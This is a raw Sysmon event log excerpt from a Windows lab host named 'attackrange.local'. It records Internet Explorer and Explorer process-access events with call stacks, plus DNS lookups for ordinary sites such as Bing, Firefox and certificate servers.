Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.272{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.272{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.150{59A5CD1D-8E56-6005-2E00-00000000A301}2464137.31.126.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.060{59A5CD1D-9410-6005-0E05-00000000A301}6584www2.bing.com0type: 5 www2-bing-com.dual-a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:20.023{59A5CD1D-9410-6005-0E05-00000000A301}6584login.live.com0type: 5 login.msa.msidentity.com;type: 5 www.tm.lg.prod.aadmsa.akadns.net;type: 5 prda.aadg.msidentity.com;type: 5 www.tm.a.prd.aadg.akadns.net;::ffff:40.126.31.137;::ffff:40.126.31.141;::ffff:20.190.159.134;::ffff:20.190.159.136;::ffff:40.126.31.1;::ffff:40.126.31.6;::ffff:40.126.31.8;::ffff:40.126.31.135;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.053{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.028{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.028{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.028{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 10341000x800000000000000013704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.756{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.740{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.740{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.740{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+593ffd(wow64) 10341000x800000000000000013700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.709{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.693{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.693{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.504{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.rootg2.amazontrust.com0::ffff:143.204.101.124;::ffff:143.204.101.190;::ffff:143.204.101.42;::ffff:143.204.101.74;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.479{59A5CD1D-9410-6005-0E05-00000000A301}6584o.ss2.us0::ffff:99.84.85.140;::ffff:99.84.85.20;::ffff:99.84.85.83;::ffff:99.84.85.98;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.462{59A5CD1D-9410-6005-0E05-00000000A301}6584www.firefox.com0type: 5 fxc-prod.moz.works;type: 5 dzlgdtxcws9pb.cloudfront.net;::ffff:143.204.90.114;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.281{59A5CD1D-9410-6005-0E05-00000000A301}6584r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.55.163.58;::ffff:23.55.163.48;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.268{59A5CD1D-9410-6005-0E05-00000000A301}6584crl.identrust.com0type: 5 identrust.edgesuite.net;type: 5 a1952.dscq.akamai.net;::ffff:23.55.163.57;::ffff:23.55.163.73;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.964{59A5CD1D-9410-6005-0E05-00000000A301}6584firefox.com0::ffff:44.236.48.31;::ffff:44.236.72.93;::ffff:44.235.246.155;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.953{59A5CD1D-940F-6005-0C05-00000000A301}6476cdn-3.convertexperiments.com0type: 5 cdn-3.convertexperiments.com.edgekey.net;type: 5 e5289.g.akamaiedge.net;::ffff:104.125.20.245;C:\Program Files\Internet Explorer\iexplore.exe 22542200x800000000000000013705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.904{59A5CD1D-9410-6005-0E05-00000000A301}6584www.mozilla.org0type: 5 www.mozilla.org.cdn.cloudflare.net;::ffff:104.18.165.34;::ffff:104.18.164.34;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.204{59A5CD1D-8E56-6005-2E00-00000000A301}246434.165.18.104.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.202{59A5CD1D-8E56-6005-2E00-00000000A301}246431.48.236.44.in-addr.arpa.0type: 12 ec2-44-236-48-31.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000013713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.526{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.rootca1.amazontrust.com0::ffff:13.35.253.148;::ffff:13.35.253.185;::ffff:13.35.253.198;::ffff:13.35.253.5;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.235{59A5CD1D-8E56-6005-2E00-00000000A301}2464140.85.84.99.in-addr.arpa.0type: 12 server-99-84-85-140.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.231{59A5CD1D-8E56-6005-2E00-00000000A301}2464148.253.35.13.in-addr.arpa.0type: 12 server-13-35-253-148.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.230{59A5CD1D-8E56-6005-2E00-00000000A301}2464124.101.204.143.in-addr.arpa.0type: 12 server-143-204-101-124.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.230{59A5CD1D-8E56-6005-2E00-00000000A301}2464114.90.204.143.in-addr.arpa.0type: 12 server-143-204-90-114.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.229{59A5CD1D-8E56-6005-2E00-00000000A301}246458.163.55.23.in-addr.arpa.0type: 12 a23-55-163-58.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000013716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.229{59A5CD1D-8E56-6005-2E00-00000000A301}246457.163.55.23.in-addr.arpa.0type: 12 a23-55-163-57.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000013756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 